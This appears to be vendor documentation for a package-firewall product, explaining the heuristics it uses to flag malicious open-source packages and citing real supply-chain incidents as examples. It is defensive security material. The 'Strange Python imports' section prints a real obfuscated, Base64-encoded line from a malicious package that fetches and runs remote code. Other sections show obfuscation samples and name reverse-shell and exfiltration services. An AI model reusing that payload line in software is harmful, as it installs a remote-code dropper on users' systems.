Analytics for Package Firewall
Package Firewall analytics use rules and heuristics to identify and assess potential security risks.
Bad author
Identifies authors known to distribute malicious software.
Importance
Software from this author shouldn’t be trusted.
Example
In July 2021, NPM removed a package published by an author using the name chrunlee. The package included a remote shell and password-stealing functionality. Over about two and a half years, users downloaded this and similar packages thousands of times.
Base64 decoding
Base64 decoding is a common technique in software development used to interpret data that’s been encoded in the Base64 format. This encoding method helps transmit and store data efficiently. However, attackers often use Base64 encoding to hide malicious scripts, payloads, or links in open-source software. Because encoded content can appear harmless, it might evade detection. In some cases, malicious scripts are decoded and executed dynamically through functions such as exec(), which makes detection and static analysis more difficult.
Importance
Using Base64 decoding to execute encoded scripts poses a serious security risk. Attackers can use it to inject and run malicious code within trusted environments without immediate detection.
Bus factor
Per https://en.wikipedia.org/wiki/Bus_factor, "The 'bus factor' is the minimum number of who would need to become unavailable (for example, get hit by a bus) from a project before the project stalls due to lack of knowledgeable or competent personnel." Software is built by people who have their own lives and priorities and who won't be around forever. This comic illustrates the problem.
Importance
If a package is no longer maintained, security issues won’t be fixed, and the package won’t be updated as its environment changes. Over time, it may stop working as expected or become incompatible with newer systems.
Examples
- core-js provides a standard library for JavaScript and is maintained by one person. As of early 2023, it was used by at least 75 of the top 100 websites. Summary of the situation and maintainer's request for help.
- cURL is the de facto standard program used to make network requests in Linux environments and is maintained by one person (see: https://onezero.medium.com/the-internet-relies-on-people-working-for-free-a79104a68bcc).
- left-pad was maintained by a single person, who deleted it because he felt that companies had taken advantage of his work. Some of the most-used JavaScript packages themselves used left-pad and were blocked when left-pad was removed.
Note that these projects have multiple contributors, who have written code that has been incorporated into the projects. What is notable is that each project has a single maintainer who owns the project, makes releases, and decides what to incorporate. If the maintainer stops working on the package, then progress on the package stops.
Cargo build file
In the Rust ecosystem, build.rs files are an important part of the build process managed by Cargo, Rust’s package manager. These build scripts run before the main build and run custom code for tasks such as compiling native libraries, generating bindings, or other setup operations. This feature provides flexibility and adaptability in Rust project builds.
Importance
Although build.rs files are useful, they can introduce security risks similar to those in other ecosystems that allow arbitrary code execution during package installation. A malicious build.rs script can run unauthorized commands and compromise the user’s system or data. Review and verify the source of any crate that includes a build script before using it.
Example
In August 2023, Phylum's automated risk detection identified a potential malware campaign leveraging the build.rs file in Rust packages. The scheme began with the release of several harmless, typosquatted packages which were later updated to include a mechanism for sending system information to a controlled Telegram channel. This early stage was crucial for uncovering the threat before it evolved into more harmful activities. For details on this campaign, see Phylum's blog post.
Compiled binary
A binary file is a computer file that isn’t a text file. Text files are human-readable and typically contain source code written by developers. A compiler converts that source code into a binary format that a computer can execute. Because binary files can’t be easily read or understood by humans, and are often referred to as non-human-readable files.
Importance
Binary files pose potential security risks because their contents can’t be easily inspected. Many legitimate source packages include compiled binaries for valid reasons, but binaries from unknown or untrusted sources should be treated with caution. They may contain malicious code or perform unauthorized actions.
Example
Anaconda is a popular Python distribution of scientific computing packages. Anaconda distributes binary files that are pre-compiled for common computing environments such as Windows, macOS, and Linux, and each of these binaries can be validated against a cryptographic hash provided by Anaconda. This is possible because the source code for each package is based on a specific release version which fixes that package's source code at a specific point in time. This is more than merely a great convenience for users who do not need to spend time and power compiling source code just to end up with the exact same binary file as Anaconda distributes. At any time a user can download a package's source code, compile it themselves, and compare the cryptographic hash of their binary with the hash from Anaconda's distribution to verify that the binary package distributed by Anaconda is the exact result of compiling the source code of the package.
Dependency confusion
A dependency confusion attack can occur when a package that exists in a private registry is not also registered in a public package ecosystem. Many package managers check public registries before private ones when downloading and installing packages. If an attacker discovers the name of a package in a private registry, they can upload a malicious package with the same name to a public registry. As a result, developers may unintentionally install the attacker’s package instead of the trusted private one.
Importance
Dependency confusion attacks can be difficult to detect because they don’t rely on typos, unlike typosquatting attacks. Instead, they exploit misconfigured build systems that install a package of the correct name from the wrong registry. Without a clear understanding of your build pipeline or registry configuration, you might not realize that the wrong package has been installed.
Example
In early 2021, a bug bounty researcher built an early proof of concept of this type of attack and was able to successfully demonstrate execution of his code inside more than 35 different organizations.
Depends on malware
The Package Firewall threat feed is a curated list of packages identified by the firewall as malicious. The feed integrates with other parts of the threat-detection workflow. A common tactic among malware authors is to publish a malicious package, then release another package that depends on it. This approach helps them spread malware through transitive dependencies, particularly within large or established software projects. The risk increases when the dependency is introduced by an external contributor. Any package that includes, as a dependency, another package previously flagged as malicious by the firewall is marked with the "Depends on malware" issue.
Importance
Using a package that depends on another package identified as malware poses the same risk as directly installing the malicious package.
Deprecated package
In open-source software, a deprecated package is one that’s no longer supported, recommended, or maintained by its original developers. Although these packages may still be available, using them is strongly discouraged due to security and compatibility concerns.
Importance
Deprecated packages no longer receive updates or patches for bugs and security vulnerabilities. This lack of maintenance can create significant security risks and compatibility issues with newer operating systems and dependencies. Threat actors often target deprecated packages by exploiting known vulnerabilities to gain unauthorized access or cause harm. For this reason, using deprecated packages presents substantial risk in any software environment.
Environment variable enumeration
Environment variables are a key part of most operating systems. They store and provide configuration data at runtime to programs and applications.
Importance
Environment variables sometimes contain sensitive information such as access tokens (for example, AWS API keys) or local file paths (for example, LocalAppData). Malicious software running on a system may attempt to enumerate environment variables to locate and steal this data. This behavior poses a security risk, especially when environment variables are used to store credentials or other confidential information.
Example
In April 2022, researchers discovered a set of malicious packages on PyPI that would search through environment variables looking for the location of local browser storage folders. Once found, the aim of the malware was to steal AWS or other user credentials.
Ephemeral domain
A disposable email address is a temporary or easily discarded email account. Services such as Temp Mail, SimpleLogin, and 10MinuteMail provide disposable email addresses that aren’t meant for long-term or reliable communication.
Importance
Disposable email services have legitimate uses, such as temporary communication or signing up for low-risk websites or applications. However, using a disposable email address to register a public Git repository or distribute code may indicate an attempt to conceal malicious activity.
Example
In July 2022, a malicious cryptomining campaign was attempted by leveraging the NPM ecosystem. The threat actor created more than 1,200 JavaScript packages on NPM with more than 1,000 user accounts. Each of the accounts listed a different email address with a known disposable domain.
Executes code at remote URL
A package that calls exec on code retrieved from a remote URL introduces both engineering and security risks. At runtime, it downloads source code from an external location and executes it locally.
Importance
Executing code hosted at a remote URL is fragile and unsafe. It’s not recommended for several reasons:
- The remotely executed code isn’t part of the package’s codebase, making it difficult for users to review or verify what’s being executed.
- Because the code isn’t shipped with the package, it’s often not subject to code review or maintained in source control.
- The actual author of the remote code may be unknown or unverified.
- The remote code can change at any time without requiring updates to the package itself.
- The code requires an active internet connection to download and run, which can fail in restricted or offline environments.
Example
In January 2023, Phylum witnessed a known prolific malware author group changing tactics to use the remote code execution technique. One of the many techniques this group previously used involved shipping highly obfuscated malware in the package itself. This is easy to spot because of the large chunk of obfuscated code. Shifting to the simple remote code execution technique not only greatly reduced the size of their malware footprint in the open source ecosystems, but it also greatly reduced the ability to identify the malware through visual inspection alone.
Expired author domains
Email addresses are commonly used as identifiers for authentication to package registries such as NPM and PyPI. An email address consists of a local part and a domain (for example, [email protected]). Domains are registered for a specific period-essentially leased-and must be renewed to maintain ownership. If a domain registration expires, it can be purchased by a new owner. The new owner then controls all email addresses under that domain and can send or receive email, including password reset messages.
Importance
Using a software package from outside your organization involves a trade-off between control, security, and development efficiency. Because it’s not practical to review every line of external code, trust in the package’s authors is critical. If a malicious actor gains control of an author’s expired email domain, they can impersonate the original author and insert malicious code into the author’s packages. This risk makes domain ownership continuity an important factor in maintaining software supply chain security.
Example
In May 2022, a security researcher noticed that the NPM package foreach was controlled by a single maintainer, whose email domain had expired. The researcher bought the domain and thus gained control of foreach. Further, because 36,826 other NPM projects used foreach as a dependency, the researcher could have inserted malware into foreach and transitively affected 36,826 other projects.
High entropy blobs
In open-source software, high entropy blobs are segments of data within code that display a high degree of randomness. This pattern often indicates that the data is encoded or encrypted. These blobs are typically dense and complex, distinguishing them from standard code or predictable data.
High entropy data is often a sign of obfuscation techniques used to hide sensitive information such as encryption keys, credentials, or embedded malicious payloads. This approach helps conceal the true purpose of the data and can make analysis more difficult.
Importance
High entropy blobs can pose significant security risks. Threat actors often use them to hide malicious code within otherwise legitimate software packages. Because these blobs are designed to evade detection, they can prevent traditional security tools from identifying or analyzing the hidden content.
Hostname identification
A hostname found in source code isn’t inherently suspicious or malicious. The hostname’s purpose and the context in which it appears determine whether it poses a risk.
Review hostnames in source code carefully to ensure that no malicious actor is attempting to connect to network resources that could deliver harmful content.
Importance
Hostnames can serve legitimate purposes, such as accessing APIs or internal services. However, they can also be used by malware to communicate with command-and-control servers or retrieve malicious payloads.
Example
Legitimate use of hostnames can sometimes be obvious. MathJax is a popular JavaScript engine for displaying math formulas in a browser. It should come as no surprise then to see the mathjax.org hostname in the package contents.
On the other hand, a ransomware attack in 2020 used a hardcoded hostname for the target.
Hostnames without a clear connection to a package’s functionality should be treated with suspicion until their legitimacy is established.
Invokes native code
Dynamic linking is the process by which an operating system loads external shared libraries and binds them to a running process. Many operating systems use shared native libraries that are dynamically linked to allow multiple processes to share a single instance of a library in memory. This approach optimizes memory usage and improves performance.
Importance
Function calls that load native code can have legitimate uses. However, packages that invoke native code may also load malicious binaries or perform actions associated with “living off the land.”
The term living off the land was introduced by Christopher Campbell and Matthew Graeber in their 2013 DerbyCon talk. It describes the use of legitimate, built-in binaries or scripts known as LOLBins to perform malicious actions. Such binaries may offer undocumented functionality that can be exploited by attackers, advanced persistent threats (APTs), or red teams.
A list of known LOLBins, libraries, and scripts is available at the LOLBAS project.
Open-source packages that call native code should be carefully reviewed. If the use of native code doesn’t align with the package’s intended functionality, the package should be considered untrustworthy and avoided.
Example
In Java, functions such as load, loadLibrary, and loadLibraryFromJar dynamically link a library to a process.
IP address identification
An IP address (short for Internet Protocol address) found in source code should be treated with caution. Hardcoded IP addresses can be used to bypass standard DNS lookups, which is a common technique in malicious software. Whether an IP address is considered malicious depends on its purpose and the context in which it appears in the code. IP addresses in source code should be reviewed carefully to ensure that they aren’t being used to connect to external resources that could deliver harmful or unauthorized content.
Importance
IP addresses can serve legitimate purposes, such as connecting to internal services or testing environments. However, they’re also commonly used in malware to communicate with command-and-control servers or to exfiltrate data.
Example
While legitimate uses exist, it is uncommon to include direct IP addresses in source code.
An example of a legitimate use is a developer directly including the IP address for a DNS server, such as Google at 8.8.8.8.
On the other hand, direct IP addresses in source code can be indicative of malicious intent. Analysis of a 2017 malware campaign (see this report from US-CERT) revealed actors hard coding IP addresses that were used to connect victims to their malicious network infrastructure.
IP addresses without a clear connection to the code’s primary functionality should be treated with suspicion until their legitimacy is established.
License commercial risk
Software packages released under non-commercial licenses can pose risks for projects intended for commercial use. These licenses restrict software usage to non-profit activities and prohibit any commercial exploitation, including selling, sublicensing, or integrating the software into proprietary products.
When a package is distributed under a non-commercial license, it’s important to fully understand the terms and their implications. Non-compliance with license conditions can result in legal action, financial penalties, and reputational damage.
Importance
Using software governed by non-commercial licenses in a commercial environment can lead to serious legal and financial consequences. Organizations should identify and review all software licenses carefully to ensure compliance and reduce the risk of violations.
Example
Non-commercial licenses often have clauses that explicitly state the software cannot be used for commercial purposes. For instance, a package under the Creative Commons Non-Commercial (CC BY-NC) license prohibits using the software for any commercial purpose.
Consider the following scenario: a developer uses a library released under a non-commercial license in a proprietary application. This use case violates the terms of the license and could lead to legal disputes.
Source code distribution
Some open-source software licenses require that any derivative works or software incorporating the licensed code also be made available under the same license. In these cases, if you use, modify, or distribute the software, you must distribute your own source code under the same licensing terms.
These licenses promote transparency and collaboration by ensuring continued access to the software’s source code. However, they can conflict with commercial objectives, especially when a project involves proprietary or closed-source components.
Importance
Understanding and complying with source code distribution requirements is essential to avoid legal issues and uphold open-source licensing principles. Non-compliance can result in legal disputes or compel the release of proprietary code, potentially undermining commercial business models.
Example
Several licenses require source code distribution:
- AGPL (Affero General Public License): Software using AGPL-licensed code, including software accessed over a network, must be released under the AGPL, making the source code publicly accessible.
- GPL (General Public License): Requires derivative works to be open-sourced under the GPL, enforcing similar distribution obligations.
For instance, if you include a library released under the GPL in your proprietary application, you would be required to release your application’s source code under the GPL, making it publicly accessible and freely redistributable.
Malware bazaar check
MalwareBazaar is a public database that collects and shares known malware samples, enriched with community-driven threat intelligence. At Veracode, all files ingested from open-source packages are checked against MalwareBazaar’s repository of known malicious files. This comparison helps identify and flag components that match known malware signatures so potentially harmful files are detected before they cause damage.
Importance
Detecting a file that matches a known malware sample from MalwareBazaar is a critical security finding. Developers can use MalwareBazaar to investigate the file and review community intelligence to understand the nature and behavior of the identified malware.
Minimal code
Software with minimal code typically falls into one of two categories: packages that are trivially small or those composed primarily of binary artifacts.
A trivially small package may not provide enough functionality to justify the security risks associated with adopting external software. Such packages can also be more susceptible to compromise in future releases. In many cases, it may be safer and more efficient to implement the same functionality internally.
Packages that primarily contain binary artifacts offer limited transparency. While this isn’t inherently a problem, it means the software can’t be fully inspected. Although runtime behavior can be observed, the full capabilities and potential risks of the software remain unknown.
Importance
Organizations should adopt external software only when the benefits outweigh the risks. If the functionality provided by a package can be easily developed in-house, doing so may reduce exposure to security risks. When a package can’t be inspected, the organization should carefully evaluate whether the functionality it provides justifies the potential security concerns.
Example
In March 2016, a programmer removed all of his packages from the npm repository, including a trivial package called left-pad. Left-pad was used, either directly or indirectly, by several extremely popular packages, including Facebook's React, which is very widely used. When left-pad was removed from npm, all direct and indirect consumers were unable to build their software because the dependency package was no longer available.
NPM hooks
NPM scripts are commands defined in a package’s package.json file that can be executed at various stages of the package lifecycle, including installation, testing, and deployment.
These scripts are commonly used to automate tasks such as running tests, building code, or performing setup operations. However, because NPM scripts can execute arbitrary code during installation, they present security risks if not reviewed.
Importance
While NPM scripts are a powerful tool for package management and automation, they can also be exploited to execute malicious commands without the user’s knowledge. Review and validate any commands in the scripts section of package.json before installation to ensure they do not perform unsafe or unauthorized actions.
Example
In October 2022, Phylum detected a typosquatting attack on the NPM ecosystem that targeted over 120 high profile packages including tslib, ignore, and anymatch. At the time of the attack these packages accounted for over 1.2 Billion weekly downloads--a gigantic attack surface targeting a huge number of developers. Once installed, the packages, whose index.js file contained the malicious code, would be automatically triggered to execute via a preinstall hook in the package.json file.
NPM security holding
An npm security holding package, typically released with the version number 0.0.1-security, is a placeholder published by npm to replace a package that has been removed from the registry for security reasons. This placeholder prevents malicious actors from reusing the original package name and alerts users that earlier versions may have contained security vulnerabilities or malicious code.
Importance
The presence of an npm security holding package indicates that the original package has been deprecated due to critical security concerns and should not be used. Developers who discover that their projects depend on such a package should assume the system might be compromised. Immediate action should be taken to remove the package, review dependency chains, and perform a thorough security audit to ensure no residual malicious code remains.
NuGet install scripts
In the NuGet package management system, install scripts such as tools/init.ps1 and tools/install.ps1 are PowerShell scripts executed during the installation of a NuGet package. These scripts are designed to perform setup tasks such as configuring settings, adjusting permissions, or installing additional components required by the package. This automation facilitates the seamless integration of packages into larger projects.
Importance
While NuGet install scripts provide significant convenience by automating complex installation processes, they also introduce security risks by executing arbitrary PowerShell code during package installation. This can be exploited by malicious actors to execute unauthorized code, potentially leading to system compromise or data breaches. Inspect the source and contents of any NuGet package that includes install scripts, ensuring that they come from trustworthy sources and do not contain malicious code.
Obfuscated JavaScript
In software development, code obfuscation is the intentional process of making source code difficult for humans to read or interpret. Obfuscation is often used to conceal the true purpose or functionality of the code.
For example, the following JavaScript function simply prints “Hello World!” to the console:
function hi() {
console.log("Hello World!");
}
hi();
If published like that, it should be more than obvious to most developers exactly what that code is doing. However, that same code, once gone through obfuscation tools, looks like this:
(function(_0x26f70c,_0x4e6c92){var _0x3a9801=_0x4e03,_0x3e81f1=_0x26f70c();while(!![]){try{var _0x57c30a=parseInt(_0x3a9801(0x1e0))/0x1+-parseInt(_0x3a9801(0x1e1))/0x2*(parseInt(_0x3a9801(0x1e5))/0x3)+parseInt(_0x3a9801(0x1e7))/0x4+parseInt(_0x3a9801(0x1e4))/0x5+-parseInt(_0x3a9801(0x1ea))/0x6*(-parseInt(_0x3a9801(0x1e2))/0x7)+parseInt(_0x3a9801(0x1e6))/0x8*(-parseInt(_0x3a9801(0x1e9))/0x9)+-parseInt(_0x3a9801(0x1df))/0xa;if(_0x57c30a===_0x4e6c92)break;else _0x3e81f1['push'](_0x3e81f1['shift']());}catch(_0x5a2b26){_0x3e81f1['push'](_0x3e81f1['shift']());}}}(_0x3d1f,0xe9b9d));function _0x4e03(_0x55d606,_0x54117d){var _0x3d1f03=_0x3d1f();return _0x4e03=function(_0x4e031b,_0x106628){_0x4e031b=_0x4e031b-0x1df;var _0x5e4b7c=_0x3d1f03[_0x4e031b];return _0x5e4b7c;},_0x4e03(_0x55d606,_0x54117d);}function hi(){var _0x572c2c=_0x4e03;console[_0x572c2c(0x1e3)](_0x572c2c(0x1e8));}function _0x3d1f(){var _0x2c862a=['3988352DxkmDj','632512SZNfDd','Hello\x20World!','9NtNzQn','6WfYOmz','18643720nibnLE','1667797VhclOj','702KafXLL','13084400HKrzBf','log','145665eGCCHn','3453BajacZ'];_0x3d1f=function(){return _0x2c862a;};return _0x3d1f();}hi();
Without significant time and effort, it's impossible to tell what this code is doing by just looking at it.
Importance
While there are a few legitimate use cases worthy of code obfuscation, finding obfuscated code in the open source ecosystem is noteworthy because it is atypical and goes against the grain of the spirit and purpose of the open source software community. If found, it should be treated with caution because it could be hiding malicious intent.
Example
In the summer of 2022, researchers published details of a supply-chain attack on the NPM ecosystem that dated back to December 2021. In this campaign, dubbed IconBurst, threat actors used typosquatting to distribute malicious and obfuscated JavaScript packages. Once installed, these packages stole login credentials from embedded website forms. Even though the source code for these packages was publicly available, the obfuscation prevented users from recognizing its malicious intent.
Obfuscated Python
In software development, code obfuscation is the act of deliberately making source code difficult for humans to read or understand with the ultimate purpose of trying to conceal what the code is doing.
For example, here is a small snippet of what obfuscated Python code might look like:
def ___________________(__________, ___________):
__________=__________.decode()
_________=""
if not ___________[False]=="\x20":
___________="\40"+___________
for _ in range(_____("\154\x65\156\50\137\137\137\137\137\137\x5f\137\x5f\x5f\51")):
_________+=_____("\143\150\162\x28\x6f\x72\x64\x28\137\x5f\137\x5f\x5f\137\137\137\x5f\137\133\137\x5d\51\136\x6f\162\144\x28\137\x5f\137\x5f\x5f\137\x5f\137\137\x5f\x5f\x5b\x28\154\145\156\x28\137\x5f\137\x5f\x5f\x5f\137\137\x5f\137\x5f\51\x20\55\x20\124\162\x75\145\x2a\x32\x29\40\53\40\x54\162\165\145\135\x29\51")
return (_________,___________)
Without significant time and effort, it's impossible to tell what this code is doing by just looking at it.
Importance
Finding obfuscated code in the open source ecosystem is noteworthy because it is atypical and goes against the grain of the spirit and purpose of the open source software community. If found, it should be treated with caution because it could be hiding malicious intent.
Example
In the fall of 2022, Phylum published details of a supply-chain attack on the PyPI ecosystem in which threat actors made sophisticated attempts to deploy W4SP Stealer onto Python developers’ machines. In this campaign, the attackers used typosquatting to distribute malicious and highly obfuscated Python packages. Once installed, these packages stole login credentials, cryptocurrency wallets, browser cookies, and other sensitive data. Even though the source code for these packages was publicly available, the obfuscation prevented users from recognizing its malicious intent.
Unverifiable dependency
Package installers typically download dependencies from official registries based on the package name and version specified in the manifest file. These dependencies are verifiable because their source, version, and integrity can be validated against the registry.
However, many package managers also support installing dependencies directly from external sources such as Git repositories, Gists, or URLs. Dependencies retrieved from these external sources are considered unverifiable because you cannot reliably ensure that the referenced package remains unchanged or originates from a trusted source.
Importance
Treat code from unverified or unknown sources with caution until you confirm its origin and integrity. Unverifiable dependencies introduce risk because they offer no assurance that the installed package matches the intended version or content. That uncertainty increases the likelihood of tampering, supply-chain compromise, or the unintentional inclusion of malicious code.
Example
In the npm ecosystem, the package.json file lists the package’s dependencies (see the documentation for details). npm supports multiple ways to specify dependencies, including URLs as dependencies, git URLs, GitHub URLs, and local paths.
The contrived package [email protected] on npm lists "react": "git://github.com/facebook/react.git" as a dependency. Whatever code exists at that location at that time is imported as the dependency, and this reference alone does not guarantee that the intended version of react will be used.
Python build hook
In the Python ecosystem, the pyproject.toml file defines a project’s build system and configuration. It supports build hooks that run custom code during the build process via tools such as Hatch, PDM, or Poetry. Build hooks provide flexibility for automating build tasks, customizing workflows, and integrating complex operations such as compiling native extensions. This functionality supports modern Python project workflows but requires careful handling to maintain security and reliability.
Importance
Although build hooks are powerful, they can introduce significant security risks if misused. Because build-hook code executes automatically during package installation, an attacker could run unauthorized commands or distribute malware. Review build scripts carefully and validate the integrity and trustworthiness of any external packages that define them. For more information, see Modern Python Build Hooks.
Remote executable
An executable file is a compiled binary designed to run on a host system and perform tasks according to its programmed instructions.
Importance
Executable files are not inherently malicious. Most software running on a computer is an executable program. However, open-source packages rarely reference URLs that point to executable files. This behavior can indicate a potential malware dropper. A package that downloads an executable from a remote URL, writes it to disk, and executes it is highly suspicious. This activity might signal an attempt to install or run unauthorized software. Developers and security teams should treat this pattern as a serious warning and investigate the package’s source and behavior before using it.
Example
In August 2022, researchers discovered about a dozen malicious packages on PyPI that attempted a typosquatting attack. If installed, these packages downloaded an executable payload from a malicious URL, saved it to disk, and executed file--all from within setup.py. In one observed case, the executable recruited the host machine into a DDoS campaign against a Russian Counter-Strike server.
Ruby install hooks
In the RubyGems ecosystem, install hooks permit arbitrary code execution during gem installation via a rubygems_plugin.rb file. Developers define actions to run before installation with Gem.pre_install or after installation using Gem.post_install. This feature automates setup tasks such as configuring software, validating dependencies, and setting environment variables. While useful for streamlining installation workflows, this capability requires careful consideration due to its potential security impact.
Importance
Ruby install hooks provide flexibility and convenience but also introduce significant security risks. Because install hooks permit arbitrary code execution, attackers can exploit them to perform unauthorized actions during gem installation. Review and verify the source and integrity of any gem that uses install hooks before adding it to your environment. Use trusted repositories and scan gems for unexpected install behavior to reduce the risk of supply-chain attacks.
Secrets
When publishing software to an open-source ecosystem, avoid including private credentials and other sensitive information in the codebase. Accidental exposure can occur through various means, such as committing configuration or production files, or through a misconfigured continuous integration/continuous deployment (CI/CD) pipeline. These mistakes can result in the exposure of sensitive data, for example, API keys, access tokens, or passwords and lead to unauthorized access, data breaches, or other security incidents.
Importance
Using open-source software that contains exposed secrets creates several security and compliance risks:
- Reduced trust and software integrity: Leaked secret keys damage trust in the software and its development process and may indicate broader weaknesses in the organization’s security posture.
- Increased risk of supply-chain attacks: Leaked credentials can let attackers compromise developer accounts, CI/CD systems, or dependent applications, which can lead to injected malicious code, removal of legitimate software, or compromise of downstream users.
- Legal and regulatory concerns: Depending on the exposed secret and applicable laws, using or distributing software with leaked credentials may cause noncompliance or legal liability.
Example
In 2022, a hacker obtained hardcoded credentials to Uber’s privileged access management platform and used them to take over several internal applications and tools. Although the credentials did not come from published open-source software, this case highlights the importance of protecting sensitive credentials for every application.
Strange Python imports
In Python, most modules and packages are imported using standard syntax such as import module or from module import name. This practice is explicitly recommended in the PEP 8 Style Guide for Python Code.
For example, the following is functionally similar to import os:
# Import our `os` package
xyz = __import__("\x6F\x73")
# Use our imported package
xyz.system("whoami")
At first glance, the os import is not obvious. Authors often use this pattern to obscure functionality and hide potentially nefarious behavior.
Importance
Code that obfuscates imports is difficult to review and may hide dangerous functionality. Code that uses these strange imports often tries to hide malicious behavior. Review any package that contains these imports and reconsider its use in your project.
Example
In 2022, several packages on PyPI used imports like these. The typosquatted package pyquest contained such imports hidden in an otherwise benign file.
;__import__('\x62\x75\x69\x6c\x74\x69\x6e\x73').exec(__import__('\x62\x75\x69\x6c\x74\x69\x6e\x73').compile(__import__('\x62\x61\x73\x65\x36\x34').b64decode("ZnJvbSB0ZW1wZmlsZSBpbXBvcnQgTmFtZWRUZW1wb3JhcnlGaWxlIGFzIF9mZmlsZQpmcm9tIHN5cyBpbXBvcnQgZXhlY3V0YWJsZSBhcyBfZWV4ZWN1dGFibGUKZnJvbSBvcyBpbXBvcnQgc3lzdGVtIGFzIF9zc3lzdGVtCgpfdHRtcCA9IF9mZmlsZShkZWxldGU9RmFsc2UpCl90dG1wLndyaXRlKGIiIiJmcm9tIHVybGxpYi5yZXF1ZXN0IGltcG9ydCB1cmxvcGVuIGFzIF91dXJsb3BlbjtleGVjKF91dXJsb3BlbignaHR0cHM6Ly96ZXJvdHdvLWJlc3Qtd2FpZnUub25saW5lLzc3ODExMjk4NTc0MzI1MS93YXAvc2hhdGxlZ2F5L2luamVjdG9yMHg5NzQ4JykucmVhZCgpKSIiIikKX3R0bXAuY2xvc2UoKQp0cnk6IF9zc3lzdGVtKGYic3RhcnQge19lZXhlY3V0YWJsZS5yZXBsYWNlKCcuZXhlJywgJ3cuZXhlJyl9IHtfdHRtcC5uYW1lfSIpCmV4Y2VwdDogcGFzcw=="),'<string>','\x65\x78\x65\x63'))
Suspicious setup commands
In a Python package, the setup.py file is used to build and distribute the package. It defines metadata, for example, package name, version, and dependencies and build and installation instructions. This file is used to publish packages to PyPI and to install them locally with commands such as pip install <package_name>. When a user installs a package, the setup.py file is automatically executed by the Python interpreter. This automation makes it a powerful and convenient tool for package management but also introduces potential security risks.
Importance
Because setup.py runs during installation, attackers can embed malicious code that executes automatically on the target system. A user can become compromised simply by installing a package, even if they never run it. Inspect setup.py files for dangerous commands, for example, file system modifications, network calls, or arbitrary code execution and install packages only from trusted sources. Review installation scripts before execution to help prevent inadvertent malware deployment.
Example
One of the most prolifically distributed pieces of malware discovered so far in PyPI, the W4SP Stealer, resulted in publishing over 100 separate packages containing W4SP. Attackers often used setup.py as the first stage of a complex attack chain.
Suspicious URL references
Certain URLs, while not inherently malicious, can indicate suspicious or potentially harmful behavior when referenced in open-source software. Review these URLs in context to determine their legitimacy and intent.
Common examples include:
- Paste tools - services such as Pastebin.com store and share text or code snippets. Attackers can host malicious code there that compromised software later downloads and executes.
- Web application security testing tools - references to penetration testing or vulnerability scanning servers might indicate that a package is probing systems for weaknesses that could later be exploited.
- Unusual content delivery networks (CDNs) - although CDNs are common for performance and distribution, references to obscure or untrusted CDNs might indicate that the package retrieves and executes external files.
- Obfuscation tools - these tools deliberately make source code difficult to read or analyze. Their presence in a package might indicate an attempt to conceal malicious logic.
- Reverse shells - references to web-based reverse shell tools (for example,
tcp.ngrok.io) might suggest that the package is designed to provide unauthorized remote access to a victim’s system. - Data exfiltration tools - these tools enable attackers to transfer stolen data from a compromised system to an external location.
- Public IP address checking services - legitimate software rarely needs to know the system’s public IP address. References to such APIs may indicate that the package is collecting network information for malicious purposes.
- Tor Darknet to Clearnet proxy services - connections to Tor proxy services can hide the origin or destination of network traffic, which is suspicious in open-source software.
Importance
Although the URLs and services listed above are not inherently malicious, their appearance in open-source software should prompt careful scrutiny. Evaluate each reference’s purpose to determine whether it serves a legitimate function or indicates possible malicious intent.
Example
In 2020, researchers found that the Discord CDN hosted malicious software such as Epsilon ransomware, the RedLine stealer, and the XMRig cryptocurrency miner.
Typosquatting
Typosquatting happens when attackers exploit common typographical errors developers make when specifying package names. For example, a developer intending to install the popular UI framework react might accidentally type raect - transposing the letters a and e. Attackers can exploit these mistakes by publishing packages under the misspelled names. In some cases, attackers include legitimate functionality (for example, the real react package) alongside hidden malicious code, which makes the compromise harder to detect. As a result, developers who inadvertently install these impostor packages may unknowingly execute harmful code on their systems.
Importance
Even a small typographical error in a package name can install a malicious dependency and introduce critical security threats. To mitigate this risk, always verify package names, versions, and sources before installation, and consider using tools or registries that flag potential typosquatted packages.
Example
Typosquatted packages are routinely removed from open-source ecosystems. High-profile incidents in NPM, PyPI, and other registries have increased in recent years. In December 2019, researchers uncovered a malicious Python package called Jeilyfish. It contained a backdoored implementation of the legitimate Jellyfish package that stole SSH and GPG keys. That package existed for over a year before detection and averaged several hundred downloads per month.
Webhook exfil
A Discord webhook is a feature external services use to send automated messages or notifications to a specific Discord channel. Although this functionality supports automation and monitoring, attackers also use it for data exfiltration in credential-stealing malware.
Importance
The presence of a hard-coded webhook within an open-source software package is a strong indicator of potential malicious intent. When a webhook is combined with a POST request, it can exfiltrate sensitive data. For example, credentials, tokens, or environment variables - to an external destination. Most malware that uses webhook exfiltration executes during package installation. For example, running a command such as pip install <package> (for PyPI) can trigger automatic exfiltration. Treat any package that contains webhook references with caution and review its code for data-exfiltration mechanisms before installation.
Example
Using a Discord webhook for data exfiltration is relatively new but has been widely observed and documented in publications. Often, these stealers activate during package installation and are visible on a cursory code review. However, in March 2023, Phylum released an article outlining how attackers are now utilizing this method in a more subtle manner by concealing the stealer code deep within existing packages.